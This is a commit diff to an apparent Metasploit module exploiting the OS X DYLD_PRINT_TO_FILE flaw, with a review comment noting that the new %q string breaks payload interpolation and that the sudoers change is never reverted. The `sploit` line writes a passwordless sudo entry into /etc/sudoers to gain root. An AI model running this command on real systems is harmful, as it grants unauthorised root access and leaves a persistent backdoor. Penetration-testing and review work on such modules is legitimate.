FIxup pr #5758
parent
165cb195bf
commit
9d8dd2f8bd
|
@ -17,8 +17,11 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
super(update_info(info,
|
||||
'Name' => 'Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation',
|
||||
'Description' => %q{
|
||||
In Mac OS X 10.10.x, the DYLD_PRINT_TO_FILE environment variable is still
|
||||
supported for suid binaries. This allows an arbitrary file write as root.
|
||||
In Apple OS X 10.10.4 and prior, the DYLD_PRINT_TO_FILE
|
||||
environment variable, usually used for redirecting logging data to a
|
||||
file, instead of the usual stderr. Due to a design error, this feature
|
||||
can be abused by a local attacker to write arbitrary files as root, via
|
||||
restricted, SUID root binaries.
|
||||
},
|
||||
'Author' => [
|
||||
'Stefan Esser', # Vulnerability discovery and PoC
|
||||
|
@ -69,7 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def sploit
|
||||
"/bin/sh -c \"echo 'echo \\\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &\""
|
||||
%q{/bin/sh -c "echo 'echo \\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &"}
|
||||
end
|
||||
|
||||
def binary_payload
|
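Review bot: In `sploit`, the new `%q{...}` literal does not interpolate, so `#{payload_file}` is passed to the shell as literal text rather than the path the removed double-quoted string expanded; `%Q{...}` keeps the reduced escaping and still interpolates. Separately, the command appends a NOPASSWD entry to /etc/sudoers and nothing in the visible hunks reverts it, so unless cleanup exists outside this view the tested host keeps a persistent privilege change. A comment on `sploit` such as `# Appends a NOPASSWD line to /etc/sudoers; revert it when the session ends` would make that explicit for operators and reviewers. The rewritten Description is also a sentence fragment: the clause starting "the DYLD_PRINT_TO_FILE environment variable, usually used for ..." never reaches a verb. The class body continues outside both hunks.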